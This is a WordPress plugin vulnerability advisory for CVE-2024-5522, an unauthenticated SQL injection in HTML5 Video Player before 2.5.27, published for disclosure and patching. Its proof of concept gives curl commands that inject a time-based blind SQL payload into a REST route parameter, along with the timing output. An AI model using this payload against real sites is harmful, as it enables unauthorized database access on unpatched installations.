HTML5 Video Player < 2.5.27 – Unauthenticated SQLi | CVE 2024-5522 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

Proof of Concept

% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-"

{"code":"not_found","message":"Data not found","data":{"status":404}}curl   0.01s user 0.02s system 0% cpu 5.760 total

% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)--+-"

{"code":"not_found","message":"Data not found","data":{"status":404}}curl   0.01s user 0.01s system 1% cpu 1.204 total

Affects Plugins

html5-video-player

Fixed in 2.5.27

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Mayank Deshmukh

Submitter

Mayank Deshmukh

Submitter website

https://coldfusionx.github.io/

Submitter twitter

Verified

Yes

WPVDB ID

bc76ef95-a2a9-4185-8ed9-1059097a506a

Timeline

Publicly Published

2024-05-30 (about 1 year ago)

Added

2024-05-30 (about 1 year ago)

Last Updated

2024-05-30 (about 1 year ago)

Other

Published

Title

Published

2023-05-22

Title

Integration for Contact Form 7 and Zoho CRM, Bigin < 1.2.4 - Admin+ SQLi

Published

2025-02-23

Title

WP Multistore Locator < 2.5.2 - Unauthenticated SQL Injection

Published

2025-04-10

Title

Cost Calculator Builder < 3.2.68 - Authenticated (Subscriber+) SQL Injection via order_ids Parameter

Published

2025-07-08

Title

Learts Addons < 1.7.5 - Unauthenticated SQL Injection

Published

2018-02-25

Title

WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection